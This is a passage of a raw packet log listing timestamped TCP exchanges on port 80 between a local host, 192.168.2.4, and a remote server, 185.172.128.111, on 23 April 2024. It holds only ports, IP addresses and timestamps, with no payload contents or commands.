Apr 23, 2024 09:27:04.523209095 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523232937 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523287058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523324013 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523344994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523366928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523453951 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523530960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523552895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523587942 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523611069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523626089 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.523632050 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.523679018 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573688984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573743105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573785067 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573821068 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573858023 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573873997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573874950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573874950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573874950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573895931 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573934078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.573951006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573951006 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.573992014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.574415922 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574453115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574588060 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.574589014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.574748993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574791908 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574829102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574865103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574899912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574935913 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.574990988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575002909 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575004101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575004101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575004101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575004101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575004101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575030088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575067997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575088978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575088978 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575105906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575114965 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575143099 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575170994 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575181007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575191021 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575218916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575247049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575257063 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575273991 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575294018 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575309038 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575350046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575581074 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575618029 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575639963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575654984 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575661898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575706959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575711012 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575792074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575849056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575891972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.575913906 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575937033 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.575990915 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576049089 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576064110 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576153040 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576174974 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576189995 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576210022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576227903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576234102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576267004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576298952 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576319933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576560974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576598883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576617956 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576633930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576643944 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576670885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576685905 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576725960 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576894999 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576930046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576946020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.576967001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.576982975 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577003956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577023029 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577040911 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577061892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577078104 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577100039 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577116966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577130079 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577168941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577186108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577243090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577405930 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577444077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577467918 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577481031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577488899 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577538013 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577553988 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577605963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577685118 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577723980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.577749014 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.577768087 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626379967 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626440048 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626480103 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626517057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626553059 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626580000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626580000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626588106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626580000 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626580954 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626631021 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626666069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626666069 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626669884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626693010 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626707077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626725912 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626744986 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626764059 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626781940 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626808882 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626818895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626830101 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626857996 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626876116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626899004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626925945 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626935959 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626946926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.626974106 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.626980066 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627010107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627022982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627046108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627082109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627087116 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627104044 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627124071 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627159119 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627175093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627175093 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627197027 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627208948 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627234936 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627252102 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627274990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627299070 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627321959 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627481937 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627521992 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627543926 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627557993 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627568007 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627595901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627610922 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627654076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627700090 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627759933 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.627769947 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.627825022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.628971100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.629035950 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.677853107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.677892923 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.677951097 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.677992105 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678028107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678046942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678046942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678046942 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678047895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678064108 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678102016 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678122997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678122997 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678138971 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678147078 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678194046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678236008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678272963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678309917 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.678466082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678466082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.678466082 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.679197073 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.679234982 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.679258108 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.679297924 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729178905 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729397058 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729423046 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729463100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729473114 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729528904 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729542017 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729734898 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729753971 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729779005 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729821920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729821920 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729866028 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729923010 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729945898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.729976892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.729976892 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730019093 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730025053 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730056047 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730061054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730093002 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730098963 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730129004 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730156898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730165958 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730180979 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730207920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730231047 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730242968 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730251074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730288982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730312109 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730349064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730361938 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730393887 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730448008 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730484009 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730498075 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730530024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730583906 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730622053 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730634928 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730679989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730690956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730741024 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730881929 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730918884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730930090 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730956078 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.730973005 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.730997086 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.779886007 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.779957056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.779998064 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780035973 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780073881 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780141115 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780184031 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780220985 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780226946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780226946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780226946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780226946 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780227900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780227900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780227900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780258894 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780324936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780324936 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780879974 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780917883 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780944109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.780953884 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.780991077 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781007051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781007051 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781030893 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781035900 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781070948 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781094074 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781107903 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781126022 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781145096 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781174898 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781188011 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781193972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781225920 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781249046 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781276941 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781358957 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781395912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781430960 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781469107 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781522036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781522036 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781522989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781522989 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781832933 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781871080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781888008 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781908035 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781923056 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781944990 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.781968117 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.781984091 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782020092 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782037020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782037020 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782058001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782062054 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782097101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782104969 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782140017 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782201052 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782255888 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782272100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782308102 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782322884 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782345057 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782354116 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:27:04.782381058 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:27:04.782396078 CEST	49730	80	192.168.2.4	185.172.128.111
